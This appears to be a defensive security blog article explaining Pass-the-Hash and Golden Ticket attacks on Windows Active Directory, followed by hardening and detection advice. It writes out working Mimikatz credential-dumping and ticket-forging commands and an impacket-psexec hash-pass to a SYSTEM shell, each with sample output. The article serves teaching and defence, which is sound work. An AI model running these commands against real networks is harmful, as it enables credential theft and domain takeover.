In 2024, the BlackBasta ransomware group compromised dozens of enterprise networks without ever cracking a single password. They stole credential hashes from memory and walked sideways through Active Directory using Pass-the-Hash and Pass-the-Ticket. If your environment runs Windows and AD, these two techniques are among the most practical threats you face today.
Pass-the-Hash: Using a Hash Like a Password
Pass-the-Hash (PtH) exploits the way NTLM authentication works. Windows doesn’t always need your plaintext password — it accepts the NTLM hash directly during the challenge-response handshake. An attacker who dumps a hash from memory can authenticate as that user without ever knowing the real password.
The classic tool here is Mimikatz — an open-source credential extraction utility. After gaining local admin access on a compromised workstation (WS-FINANCE-04, 192.0.2.44), an attacker runs:
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 642301 (00000000:0009cabd)
Session : Interactive from 1
User Name : jharrison
Domain : CORP
Logon Server : DC-CORP-01
Logon Time : 10/10/2026 08:14:33
SID : S-1-5-21-3847294729-182938471-9274638201-1104
msv :
[00000003] Primary
* Username : jharrison
* Domain : CORP
* NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
* SHA1 : a89d30e3a5b49251b2e3e07a5a7de986b9eac3f2
That NTLM hash (8846f7...) belongs to CORP\jharrison. The attacker doesn’t need to crack it. They pass it directly to authenticate against another machine — say, the file server at 192.0.2.10:
impacket-psexec CORP/jharrison@192.0.2.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 192.0.2.10.....
[*] Found writable share ADMIN$
[*] Uploading file kHJtqRxP.exe
[*] Opening SVCManager on 192.0.2.10.....
[*] Creating service XtbL on 192.0.2.10.....
[*] Starting service XtbL.....
[!] Press help for extra shell commands
C:\Windows\system32>
That’s a SYSTEM shell on the file server — gained purely with a stolen hash. No password crack required. From here the attacker pivots further: dumping more hashes, reaching domain controllers, or deploying ransomware payloads.
Pass-the-Ticket: Forging Your Way Through Kerberos
Pass-the-Ticket (PtT) targets Kerberos instead of NTLM. Kerberos uses encrypted tickets — specifically Ticket Granting Tickets (TGTs) and Service Tickets — to authenticate users to resources. Steal a ticket from memory and you can impersonate that user for the ticket’s lifetime, typically 10 hours.
The most dangerous variant is the Golden Ticket attack. If an attacker compromises the krbtgt account hash (the Kerberos key distribution center account), they can forge TGTs for any user, including domain admins, indefinitely. Here’s what generating a Golden Ticket looks like in Mimikatz:
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-3847294729-182938471-9274638201 /krbtgt:d3f1a8d9b4e7c2fa8d3e1b5c9a0f7d2e /ticket:golden.kirbi
User : Administrator
Domain : corp.local (CORP)
SID : S-1-5-21-3847294729-182938471-9274638201
User Id : 500
Groups Id : 513 512 520 518 519
ServiceKey: d3f1a8d9b4e7c2fa8d3e1b5c9a0f7d2e - rc4_hmac_nt
Lifetime : 10/10/2026 09:00:00 ; 10/10/2036 09:00:00
-> Ticket : golden.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
Notice the lifetime: 2026 to 2036. This forged ticket grants domain admin access for ten years unless the krbtgt password is rotated — twice, because of how AD caches it. The attacker injects it into memory with kerberos::ptt golden.kirbi and then accesses any resource in the domain as Administrator. Event logs will show legitimate-looking Kerberos authentication. Detection requires monitoring for tickets with abnormal lifetimes or PAC validation anomalies.
Defending Against Both Attacks
These attacks succeed because of predictable weaknesses: NTLM still enabled, LSA protection disabled, and overprivileged accounts cached everywhere.
- Enable LSA Protection — add
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1to block Mimikatz from reading LSASS memory on modern Windows. - Disable NTLM where possible — use Group Policy under Security Settings > Local Policies > Security Options to restrict NTLM to domains you control.
- Rotate krbtgt twice after any suspected compromise — use Microsoft’s New-KrbtgtKeys.ps1 script.
- Deploy Microsoft Defender for Identity (formerly ATA) — it has built-in detections for Golden Ticket anomalies and unusual lateral movement patterns.
- Enforce tiered admin accounts — domain admin credentials should never touch workstations. A stolen workstation hash shouldn’t reach your DC.
Both attacks are loud in one place: Windows Event logs. PtH lateral movement via PsExec triggers Event ID 4624 (Logon Type 3) and 4648. Golden Tickets with non-standard lifetimes show up in Event ID 4769 with encryption type 0x17 (RC4) when your environment uses AES.
What To Do Now
Open PowerShell on a domain controller right now and run Get-ADDefaultDomainPasswordPolicy — then check when krbtgt last had its password changed with Get-ADUser krbtgt -Properties PasswordLastSet | Select PasswordLastSet. If it’s been over 180 days, or if you’ve had any suspected compromise in that window, schedule the double-rotation this week. That single action eliminates existing Golden Tickets and is the highest-leverage defensive step you can take against Pass-the-Ticket attacks today.
